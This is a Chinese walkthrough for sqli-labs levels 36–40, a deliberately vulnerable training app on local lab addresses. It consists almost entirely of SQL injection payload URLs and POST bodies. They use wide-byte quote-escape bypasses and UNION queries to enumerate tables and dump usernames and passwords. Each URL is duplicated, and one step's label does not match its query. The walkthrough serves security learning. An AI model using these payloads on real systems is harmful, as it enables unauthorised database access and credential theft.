sql-labs36-40通关攻略

news2025/10/28 20:40:24

第36关

一.判断闭合点

http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+

二.查询数据库

http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+

三.查表

http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

四.查列

http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+

五.查user表里所有数据

http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+

第37关

一.进入brup抓包

进入重放器

二.查询数据库

uname=-1%df' union select database(),2#&passwd=1&submit=Submit

三.查表

uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit

四.查列

uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit

五.查user表里所有数据

uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit

第38关

一.判断闭合点

http://172.16.1.41/Less-38/?id=1%27--+http://172.16.1.41/Less-38/?id=1%27--+

二.查询数据库

http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+

三.查表

http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+

四查列

http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+

五查user表里所有数据

http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+

第 39关

一.判断闭合点

http://172.16.1.41/Less-39/?id=1--+http://172.16.1.41/Less-39/?id=1--+

二.查询数据库

http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--

三.查表

http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+

四.查列

http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+

五.查user表中所有数据

http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+

第40关

一.判断闭合点

http://172.16.1.41/Less-40/?id=1%27)--+http://172.16.1.41/Less-40/?id=1%27)--+

二.查询数据库

http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+

三.查表

http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+

四.查列

http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+

五.查user表里所有数据

http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+